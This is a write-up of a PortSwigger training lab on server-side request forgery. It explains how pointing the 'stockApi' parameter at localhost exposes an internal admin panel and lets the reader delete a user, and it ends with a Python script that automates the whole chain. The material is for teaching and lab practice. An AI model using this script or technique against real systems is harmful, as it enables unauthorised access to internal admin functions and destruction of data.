Lab 1: Basic SSRF against the local server

Write-up for Lab 1 of PortSwigger's Server-Side Request Forgery (SSRF) learning path.

Lab

The application is a shop with multiple products. Clicking "View details" on a product and then "Check stock" makes the server look up that product's inventory.

Intercepting the stock check in Burp Suite shows that it sends a "stockApi" parameter containing the URL the server should fetch. When we set it to "http://localhost:80", the server requests its own loopback interface and returns the internal application's response verbatim. Because the response body is reflected back to us, this is a non-blind SSRF: we can both reach the internal environment through the server and read what it answers. To solve the lab, we need to delete the user "carlos."

Pointing "stockApi" at the /admin endpoint on localhost returns the administrative panel, which is reachable from loopback even though it is not exposed to external clients. The response lists two users, "carlos" and "wiener," each followed by an href referencing the path that deletes that user.

With the delete endpoint known, we send its localhost URL through the same "stockApi" parameter. The server issues the deletion request on our behalf with its own network position, and the lab is marked as solved.
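The two-step chain above (fetch the admin panel through "stockApi", pull the delete href out of it, then send that href through "stockApi" again) can be automated. The script below is an added example, not part of the original write-up or of the lab; it uses only the standard library. The lab URL, the "/product/stock" form endpoint, the "username" query parameter and the sample admin HTML are assumptions made for illustration, not values taken from the page. The network functions are only called under `__main__`, so the parsing and request-building parts run offline.

```python
"""Automating the SSRF chain from the write-up (added example, stdlib only)."""
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlencode, urljoin, urlparse, parse_qs
import urllib.request

# Constructed sample standing in for the admin panel returned through stockApi.
# The real page layout is not reproduced; only the "user followed by a delete
# href" pattern described in the write-up is modelled here.
SAMPLE_ADMIN_HTML = """
<div id="users">
  <span>carlos</span> <a href="/admin/delete?username=carlos">Delete</a>
  <span>wiener</span> <a href="/admin/delete?username=wiener">Delete</a>
</div>
"""


def ssrf_body(target_url: str) -> bytes:
    """Build the form body the stock check sends, with stockApi pointing at target_url.

    urlencode percent-encodes ':' and '/', which is what the browser does for
    the real form field, so the server decodes it back to the original URL.
    """
    return urlencode({"stockApi": target_url}).encode()


class HrefCollector(HTMLParser):
    """Collect every <a href="..."> value from an HTML document."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def find_delete_link(html: str, username: str) -> Optional[str]:
    """Return the href that deletes `username`, or None if the panel has no such link.

    Assumption: the link path contains 'delete' and names the user in a
    'username' query parameter. Adjust the match if the real panel differs.
    """
    parser = HrefCollector()
    parser.feed(html)
    for href in parser.hrefs:
        parsed = urlparse(href)
        if "delete" in parsed.path and username in parse_qs(parsed.query).get("username", []):
            return href
    return None


def ssrf_fetch(lab_url: str, target_url: str) -> str:
    """POST to the stock-check form (assumed at /product/stock) and return the reflected body."""
    req = urllib.request.Request(
        urljoin(lab_url, "/product/stock"), data=ssrf_body(target_url), method="POST"
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def delete_user_via_ssrf(lab_url: str, username: str, internal_base: str = "http://localhost") -> str:
    """Fetch the admin panel via SSRF, locate the delete link, and trigger it via SSRF."""
    admin_html = ssrf_fetch(lab_url, urljoin(internal_base, "/admin"))
    link = find_delete_link(admin_html, username)
    if link is None:
        raise RuntimeError(f"no delete link for {username!r} in the admin panel")
    # The href is relative to the internal host, so resolve it against localhost,
    # not against the public lab URL.
    return ssrf_fetch(lab_url, urljoin(internal_base, link))


if __name__ == "__main__":
    import sys

    # Usage: python ssrf_lab1.py https://<your-lab-id>.web-security-academy.net
    print(delete_user_via_ssrf(sys.argv[1], "carlos")[:200])
```

Parsing the delete href out of the reflected admin page rather than hardcoding it is the point of the second step: the same loop works for any user listed, and it fails loudly if the panel does not expose the link. The "stockApi" value is a full URL, so anything the server can reach on its loopback interface can be targeted the same way.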
